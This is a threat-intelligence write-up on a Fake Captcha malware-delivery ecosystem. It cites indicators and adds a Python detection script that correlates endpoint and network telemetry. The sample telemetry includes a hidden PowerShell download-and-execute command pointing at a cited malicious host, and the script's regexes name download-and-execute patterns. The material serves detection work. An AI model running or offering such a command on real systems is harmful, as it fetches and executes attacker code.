    Fake Captcha Ecosystem Turns Trust UI Into Malware Drops

    The report examines a large-scale “Fake Captcha” ecosystem that weaponizes trusted web verification interfaces to deliver malicious payloads. Visual similarity across lures is not a reliable attribution signal, because the same front-end pattern can sit on top of different execution chains—PowerShell, VBScript, MSI installers, and server-driven push-notification delivery. Using high-volume perceptual hashing of screenshots, the analysis maps how the ecosystem is organized and emphasizes the separation between the user interface and the underlying payload workflow. Defenders are advised to move past cosmetic indicators and prioritize detection of execution logic and infrastructure.

    Censys identified 9,494 Fake Captcha assets and used perceptual hashing to cluster them by visual similarity, finding a dominant Cloudflare-like cluster representing about 70% of observed sites. Deeper review uncovered 32 distinct payload variants spanning clipboard-driven scripts, MSI-based installers, and Matrix Push C2–style push delivery. Infrastructure analysis showed separate backend server pools supporting each technique, with cited examples including 95.164.53.115 and ghost.nestdns.com.

    Detection should not depend only on visual lure characteristics or clipboard behavior. Instead, monitor for unusual browser notification permission prompts, PowerShell or VBScript download-and-execute patterns, MSI launches originating from verification-themed URLs, and network traffic associated with known Matrix Push C2 endpoints. Block or sandbox suspicious verification pages and train users to grant browser permissions only on trusted, expected sites.

    When a Fake Captcha page is encountered, alert on subsequent PowerShell, VBScript, or MSI execution as well as notification subscription events. Correlate endpoint activity with network indicators such as the referenced malicious IPs and domains. Isolate impacted systems, capture volatile memory, and perform forensic analysis of any retrieved payloads.
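    As an added example, not code from the Censys report, the following script applies the detection and correlation logic described above to constructed endpoint telemetry: process-creation, browser-notification and network events are matched against download-and-execute patterns and then joined per host with hits on the report's network indicators. The event schema, regexes and hostnames are this example's own assumptions; the only indicators taken from the report are 95.164.53.115 and ghost.nestdns.com.

```python
"""Constructed detection example for Fake Captcha follow-on activity.

Flags PowerShell/VBScript download-and-execute command lines, MSI launches
from verification-themed URLs and browser notification subscriptions, then
correlates each finding with network connections to the report's indicators.
"""
import re
from dataclasses import dataclass, field

# Indicators cited in the report (the only two named on the page).
KNOWN_IOCS = {"95.164.53.115", "ghost.nestdns.com"}

# Execution-logic patterns. These regexes are the example's own assumptions,
# not signatures published by the report; tune them to your telemetry.
POWERSHELL_DOWNLOAD = re.compile(
    r"(?i)(powershell|pwsh).*?(DownloadString|Invoke-WebRequest|\biwr\b|"
    r"\biex\b|Invoke-Expression|-enc)")
VBSCRIPT_DOWNLOAD = re.compile(r"(?i)(wscript|cscript|mshta).*?(https?://|\.vbs\b|\.hta\b)")
MSI_FROM_URL = re.compile(r"(?i)msiexec.*?https?://[^\s\"']*(captcha|verif|human)")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}


@dataclass
class Event:
    host: str
    kind: str            # "process", "network" or "notification"
    parent: str = ""     # parent image for process events
    image: str = ""
    cmdline: str = ""
    dest: str = ""       # destination host/IP for network events
    url: str = ""        # page URL for notification events


@dataclass
class Finding:
    host: str
    technique: str
    evidence: str
    matched_iocs: set = field(default_factory=set)

    def priority(self):
        # Execution logic alone is suspicious; execution plus a known
        # indicator on the same host is what an analyst should triage first.
        return "high" if self.matched_iocs else "medium"


def classify_process(ev):
    """Return the execution technique a process event matches, or None."""
    cmd = f"{ev.image} {ev.cmdline}"
    if POWERSHELL_DOWNLOAD.search(cmd):
        return "powershell_download_execute"
    if VBSCRIPT_DOWNLOAD.search(cmd):
        return "vbscript_download_execute"
    if MSI_FROM_URL.search(cmd):
        return "msi_from_verification_url"
    return None


def detect(events):
    """Produce findings, correlating each with IOC network hits on its host."""
    ioc_hits = {}  # host -> set of matched indicators
    for ev in events:
        if ev.kind == "network" and ev.dest in KNOWN_IOCS:
            ioc_hits.setdefault(ev.host, set()).add(ev.dest)
    findings = []
    for ev in events:
        if ev.kind == "process":
            technique = classify_process(ev)
            if technique is None:
                continue
            evidence = ev.cmdline
            if ev.parent.lower() in BROWSERS:
                evidence = f"parent={ev.parent}; {ev.cmdline}"
            findings.append(Finding(ev.host, technique, evidence,
                                    ioc_hits.get(ev.host, set())))
        elif ev.kind == "notification":
            findings.append(Finding(ev.host, "notification_subscription", ev.url,
                                    ioc_hits.get(ev.host, set())))
    return findings


# Constructed sample telemetry; hostnames under .invalid are placeholders.
SAMPLE_EVENTS = [
    Event("ws-01", "process", parent="explorer.exe", image="powershell.exe",
          cmdline='-w hidden -c "iwr http://ghost.nestdns.com/verify | iex"'),
    Event("ws-01", "network", dest="ghost.nestdns.com"),
    Event("ws-02", "notification", url="https://verify.example.invalid/captcha"),
    Event("ws-02", "network", dest="95.164.53.115"),
    Event("ws-03", "process", parent="chrome.exe", image="msiexec.exe",
          cmdline="/i https://verify.example.invalid/captcha/setup.msi /qn"),
    Event("ws-04", "process", parent="cmd.exe", image="powershell.exe",
          cmdline="-c Get-Process"),                      # benign admin use
    Event("ws-04", "network", dest="updates.example.invalid"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.priority()}] {f.host} {f.technique}: {f.evidence} iocs={sorted(f.matched_iocs)}")
```

    Running the script yields three findings: the PowerShell download-and-execute on ws-01 and the notification subscription on ws-02 are raised to high priority because the same hosts also connected to the report's indicators, while the MSI launch on ws-03 stays at medium pending further evidence; the routine `Get-Process` invocation on ws-04 produces nothing.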
